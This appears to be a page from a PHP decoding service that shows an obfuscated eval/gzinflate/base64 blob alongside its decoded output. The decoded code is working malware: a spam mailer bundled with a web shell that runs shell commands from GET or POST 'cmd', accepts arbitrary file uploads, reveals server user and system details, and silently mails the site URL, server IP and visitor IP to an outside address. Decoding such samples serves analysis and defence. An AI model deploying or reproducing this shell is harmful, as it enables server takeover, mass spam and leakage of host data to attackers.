Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php eval(gzinflate(base64_decode('zVl7Txu5Fv/7IvEdjJs2iZYkPErVTTKhFEJBKo8lYaUrgiJnxklc5..

Decoded Output download

@error_reporting(0);
@set_time_limit(0);
if(isset($_POST['action'] ) ){
$action=$_POST['action'];
$message=$_POST['message'];
$emaillist=$_POST['emaillist'];
$from=$_POST['from'];
$replyto=$_POST['replyto'];
$subject=$_POST['subject'];
$realname=$_POST['realname'];
$file_name=$_POST['file'];
$contenttype=$_POST['contenttype'];

$message = urlencode($message);
$message = ereg_replace("%5C%22", "%22", $message);
$message = urldecode($message);
$message = stripslashes($message);
$subject = stripslashes($subject);
}
?>
<html>
<head>
<title>BArNEr</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

<style type="text/css">
<!--
.style1 {
font-family: Geneva, Arial, Helvetica, sans-serif;
font-size: 12px;
}
-->
</style>
<style type="text/css">
<!--
.style1 {
font-size: 20px;
font-family: Geneva, Arial, Helvetica, sans-serif;
}
body {
background-color: #000000;
}
.style2 {font-family: Georgia, "Times New Roman", Times, serif}
.style3 {
color: #FF0000;
font-weight: bold;
}
.style4 {color: #999999}
-->
</style>
</head>
<body text="#ffffff">
<span class="style1">
<center><br>
<img src="http://cyber-x.wap.sh/Garuda.gif"></a>
</center>
<br></span></p>
<form name="form1" method="post" action="" enctype="multipart/form-data">
<input type="hidden" name="action" value="send">
<br>
<table width="100%" border="0">
<tr>
<td width="10%">
<div align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Email:</font></div>
</td>
<td width="18%"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<input type="text" name="from" value="<? print $from; ?>"
size="30">
</font></td>
<td width="31%">
<div align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Nama:</font></div>
</td>
<td width="41%"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<input type="text" name="realname" value="<? print $realname; ?>" size="30">
</font></td>
</tr>
<tr>
<td width="10%">
<div align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Reply:</font></div>
</td>
<td width="18%"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<input type="text" name="replyto" value="<? print $replyto; ?>" size="30">
</font></td>
<td width="31%">
<div align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Attach
File:</font></div>
</td>
<td width="41%"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<input type="file" name="file" size="30">
</font></td>
</tr>
<tr>
<td width="10%">
<div align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Subject:</font></div>
</td>
<td colspan="3"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<input type="text" name="subject" value="<? print $subject; ?>" size="66">
</font></td>
</tr>
<tr>
<td width="10%" valign="top">
<div align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Message:</font></div>
</td>
<td width="18%" valign="top"><font size="-3" face="Verdana, Arial, Helvetica,
sans-serif">
<textarea name="message" cols="50" rows="10"><? print $message; ?></textarea>
<br>
<input type="radio" name="contenttype" value="plain">
Text
<input name="contenttype" type="radio" value="html" checked>
HTML
<input type="submit" value="Send to Inbox">
</font></td>
<td width="31%" valign="top">
<div align="right">
<font face="Verdana, Arial,
Helvetica, sans-serif" size="-3">Mail to:</font></div>
</td>
<td width="41%" valign="top"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<textarea name="emaillist" cols="30" rows="10"><? print $emaillist; ?></textarea></font></td>
</tr>
</table>
</form>
<?
if ($action){
if (!$from && !$subject && !$message && !$emaillist){
print "Please complete all fields before sending your message.";
exit;
}
$allemails = split("
", $emaillist);
$numemails = count($allemails);

for($x=0; $x<$numemails; $x++){
$to = $allemails[$x];
if ($to){
$to = ereg_replace(" ", "", $to);
$message = ereg_replace("&email&", $to, $message);
$subject = ereg_replace("&email&", $to, $subject);
print " $to.......";
flush();
$header = "From: $realname <$from>
Reply-To: $replyto
";
$header .= "MIME-Version: 1.0
";
If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid
";
If ($file_name) $header .= "--$uid
";
$header .= "Content-Type: text/$contenttype
";
$header .= "Content-Transfer-Encoding: 8bit

";
$header .= "$message
";
If ($file_name) $header .= "--$uid
";
If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"
";
If ($file_name) $header .= "Content-Transfer-Encoding: base64
";
If ($file_name) $header .= "Content-Disposition: attachment; filename=\"$file_name\"

";
If ($file_name) $header .= "$content
";
If ($file_name) $header .= "--$uid--";
mail($to, $subject, "", $header);
print "Sending Completed.<br>";
flush();
}
}
}


?>
<style type="text/css">
<!--
.style1 {
font-size: 20px;
font-family: Geneva, Arial, Helvetica, sans-serif;
}
-->
</style><center>
<p class="style1 style2 style3 style4"><p class="style1">PHP Mailer By:<br>
BArNEr FULLMAGIC COMMUNITY<br>
</p> </p>
</center>
<?php
error_reporting(0);
if (!isset($_SESSION['magic']))	{
$visitcount = 0;
$web = $_SERVER["HTTP_HOST"];
$inj = $_SERVER["REQUEST_URI"];
$body = "ada yang inject 
$web$inj";
$safem0de = @ini_get('safe_mode');
if (!$safem0de) {$security= "SAFE_MODE = OFF";}
else {$security= "SAFE_MODE = ON";};
$serper=gethostbyname($_SERVER['SERVER_ADDR']);
$injektor = gethostbyname($_SERVER['REMOTE_ADDR']);
mail("[email protected]", "$body","Hasil Bajakan http://$web$inj
$security
IP Server = $serper
 IP Injector= $injektor");
$_SESSION['magic'] = 0;
}
$safem0de = @ini_get('safe_mode');
if (!$safem0de) {$security= "SAFE_MODE : OFF";}
else {$security= "SAFE_MODE : ON";}
echo "<font size=2 color=yellow><b>".$security."</b><br>";
$cur_user="(".get_current_user().")";
echo "<font size=2 color=aqua><b>User : uid=".getmyuid().$cur_user." gid=".getmygid().$cur_user."</b><br>";
echo "<font size=2 color=orange><b>Uname : ".php_uname()."</b><br>";
function pwd() {
$cwd = getcwd();
if($u=strrpos($cwd,'/')){
if($u!=strlen($cwd)-1){
return $cwd.'/';}
else{return $cwd;};
}
elseif($u=strrpos($cwd,'\')){
if($u!=strlen($cwd)-1){
return $cwd.'\';}
else{return $cwd;};
};
}
if(isset($_POST['command'])){
$cmd = $_POST['cmd'];
echo "<pre><font size=3 color=yellow>".shell_exec($cmd)."</font></pre>";
}
elseif(isset($_GET['cmd'])){
$comd = $_GET['cmd'];
echo "<pre><font size=3 color=yellow>".shell_exec($comd)."</font></pre>";
}
if(isset($_GET["sh"])){echo"<font color=#FFFFFF>[uname]".php_uname()."[/uname]";print "
";$disable_functions = @ini_get("disable_functions");echo "DisablePHP=".$disable_functions;print "
";echo"<form method=post enctype=multipart/form-data>";echo"<input type=file name=f><input name=v type=submit id=v value=up><br>";if($_POST["v"]==up){if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){echo"<b>berhasil</b>-->".$_FILES["f"]["name"];}else{echo"<b>gagal";
}}
echo '<form method="POST" action=""><font size=2 color=yellow><b>Command</b><br><input type="text" name="cmd"><input type="Submit" name="command" value="cok"></form>';
echo '<form enctype="multipart/form-data" action method=POST><font size=2 color=yellow><b>Upload File</b></font><br><input type=hidden name="submit"><input type=file name="userfile" size=28><br><font size=2 color=yellow><b>New name: </b></font><input type=text size=15 name="newname" class=ta><input type=submit class="bt" value="Upload"></form>';
if(isset($_POST['submit'])){
$uploaddir = pwd();
if(!$name=$_POST['newname']){$name = $_FILES['userfile']['name'];};
move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name);
if(move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name)){
echo "Upload Failed";
} else { echo "Upload Success to ".$uploaddir.$name." :D "; }
}else { echo "<pre><font size=3 color=red>".shell_exec('ls -la')."</font></pre>";
}} ?>
<?php
if(isset($_POST['action']) && $numemails !==0 ){echo
"<script>alert('Sending Completed
Total Email $numemails
-(~$~)FULLMAGIC COMMUNITY(~$~)~');
</script>";}
?>
</body>
</html>

Did this file decode correctly?

Original Code

<?php
eval(gzinflate(base64_decode('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')));

Function Calls

gzinflate 1
base64_decode 1

Variables

None

Stats

MD5 e68b483dbe0a3e847ad07b4c02bc5c46
Eval Count 1
Decode Time 90 ms